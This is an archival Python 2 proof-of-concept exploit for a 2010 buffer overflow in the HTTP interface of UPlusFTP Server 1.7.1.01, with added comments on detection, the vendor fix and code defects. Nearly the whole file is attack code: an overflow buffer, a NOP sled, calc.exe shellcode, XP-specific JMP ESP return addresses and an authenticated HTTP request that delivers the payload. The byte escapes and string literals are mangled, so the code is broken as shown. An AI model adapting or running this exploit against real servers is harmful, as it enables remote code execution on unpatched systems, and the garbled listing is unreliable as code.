uplusftp-overflow.txt — Posted on 28 July 2010
#!/usr/bin/python
import socket,sys,base64
# Archival copy of a 2010 proof-of-concept for a buffer overflow in the HTTP
# interface of UPlusFTP Server 1.7.1.01. As reproduced on this page the
# listing is Python 2 (print statements, str-based base64) and the
# byte-string escape sequences have been mangled in transcription, so it is
# a record of the issue rather than a runnable script.
# Defender's summary: the oversized value is delivered in the `path` query
# parameter of `GET /list.html` (see the request assembled below), and the
# request carries an HTTP Basic Authorization header, which suggests the
# affected handler sits behind authentication — confirm against the product.
# The header comments below record the vendor fix (1.7.1.02, July 2010);
# upgrading is the mitigation. For detection, a /list.html request whose
# `path` parameter is on the order of 2.4 KB (1963 + 179 + 165 + 15 + 4 +
# 30 + 12 + 2 bytes as assembled here) is the observable signature.
print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
Discovered by : Karn Ganeshen
Author : Karn Ganeshen / corelanc0d3r
KarnGaneshen [aT] gmail [d0t] com
http://ipositivesecurity.blogspot.com
Greetz out to: corelanc0d3r
http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010
# Argument check: exactly four positional arguments are expected.
if len(sys.argv) != 5:
print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
# HTTP Basic credential value: base64("user:password"), used in the
# Authorization header below. Credentials are taken from the command line,
# so they will appear in shell history and process listings.
auth = base64.b64encode(user+":"+pwd)
# Request payload assembly. The sizes are the author's measurements for
# this build; the per-service-pack comments below show why the payload is
# version-specific.
buf="A"*1963
# Filler run; the 0x90 byte is the x86 NOP. (As printed here the escapes
# are missing their backslashes, so this is a 3-character string repeated.)
buf+="x90"*179
# 165 bytes Calc.exe shellcode / badchars identified and excluded
# The author's comment above states the payload is benign (launches calc.exe).
buf+=("xd9xcax29xc9xb1x24xbfx3fxc7x66x9fxd9x74x24xf4x5e"
"x31x7ex17x03x7ex17x83xf9xc3x84x6axf9x24x0cx95x01"
"xb5x06xd0x3dx3ex64xdex45x41x7ax6bxfax59x0fx33x24"
"x5bxe4x85xafx6fx71x14x41xbex45x8ex31x45x85xc5x4e"
"x87xccx2bx51xc5x3axc7x6ax9dx98x2cxf9xf8x6ax73x25"
"x02x86xeaxaex08x13x78xefx0cxa2x95x84x31x2fx68x71"
"xc0x73x4fx81x10xbax4fxedx1dxfdx7fx68xe1x86x73xf9"
"xa2x7ax07x8dx3ex2ex9cx05x37xdbxaax5exc7xabxadx60"
"xc8x40xc5x5cx97x67xe0xfcx71x01xf4x7fxbdx6ax55x17"
"xcex07x51xb8x46x80xa4xccx99xe7xa7x37xc6x66x34xd4"
"x27x0cxbcx7fx38")
buf+="x90"*15
# Return address is OS-build specific (one per service pack, the SP3 line is
# commented out). The addresses come from system modules, which is why the
# author lists the exact tested builds above; ASLR/DEP-era systems and
# other builds are outside the PoC's scope.
#[ XP SP2 ] -> "x78x16xF3x77" #0x77F31678 JMP ESP
buf+="x78x16xF3x77"
#[ XP SP3 ] -> "x3Fx71x49x7E" #0x7E49713F JMP ESP
#buf+="x3Fx71x49x7E"
buf+="x90"*30
buf+="x66x05x7Ax03" #ADD AX,037A
buf+="x66x05x7Ax03" #ADD AX,037A
buf+="x66x05x7Ax03" #ADD AX,037A
buf+="x50xc3" #PUSH EAX + RET
print "[+] Launching exploit against " + target + "..."
# Raw HTTP/1.1 request. The overlong value is placed in the `path` query
# parameter of /list.html; the Host header is sent empty. (The line breaks
# inside these string literals are as the page reproduces them and would be
# a syntax error in Python as written.)
head = "GET /list.html?path="+buf+" HTTP/1.1
"
head += "Host:
"
head += "Authorization: Basic "+auth+"
"
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target, port))
# Single send() of the whole request; a short send is not checked and no
# response is read.
s.send(head + "
")
print "[!] Payload sent..."
s.close()
# Bare except: any failure (DNS, refused connection, send error, even
# KeyboardInterrupt) is reported with the same generic message, and the
# socket is not closed on that path.
except:
print "[x] Error!"